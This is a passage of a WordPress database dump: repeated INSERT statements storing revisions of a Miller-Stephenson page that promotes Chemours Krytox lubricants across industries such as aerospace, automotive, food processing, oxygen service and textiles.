compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 17:15:33', '2016-09-28 17:15:33', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2095, 2, '2016-09-28 17:17:23', '2016-09-28 17:17:23', '&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n\r\n<strong>Pick your Industry</strong>\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n\r\n<strong style="font-size: 14.4px;">Automotive—Squeak and Rattle</strong>\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\n<strong>Food Processing</strong>\r\n\r\n<strong>Medical Industry Equipment Applications</strong>\r\n\r\n<strong>Metal Processing</strong>\r\n\r\n<strong>Oxygen and Reactive Gas Service</strong>\r\n\r\n<strong>Power Generation</strong>\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\n<strong>Textile</strong>\r\n\r\n<strong>Tire Mold</strong>\r\n\r\n&nbsp;\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories number="10" parent="0" columns="4" title="Our categories" ]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 17:17:23', '2016-09-28 17:17:23', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2096, 2, '2016-09-28 17:18:19', '2016-09-28 17:18:19', '&nbsp;\r\n\r\n&nbsp;\r\n\r\n[accordion title="Accordian title"]\r\n\r\n[accordion-item title="Accordion Item 1 Title"]\r\nAccordion Item 1 Content Goes Here\r\n[/accordion-item]\r\n\r\n[accordion-item title="Accordion Item 1 Title"]\r\nAccordion Item 1 Content Goes Here\r\n[/accordion-item]\r\n\r\n[accordion-item title="Accordion Item 1 Title"]\r\nAccordion Item 1 Content Goes Here\r\n[/accordion-item]\r\n\r\n[/accordion]\r\n\r\n<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n\r\n<strong>Pick your Industry</strong>\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n\r\n<strong style="font-size: 14.4px;">Automotive—Squeak and Rattle</strong>\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\n<strong>Food Processing</strong>\r\n\r\n<strong>Medical Industry Equipment Applications</strong>\r\n\r\n<strong>Metal Processing</strong>\r\n\r\n<strong>Oxygen and Reactive Gas Service</strong>\r\n\r\n<strong>Power Generation</strong>\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\n<strong>Textile</strong>\r\n\r\n<strong>Tire Mold</strong>\r\n\r\n&nbsp;\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories number="10" parent="0" columns="4" title="Our categories" ]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety 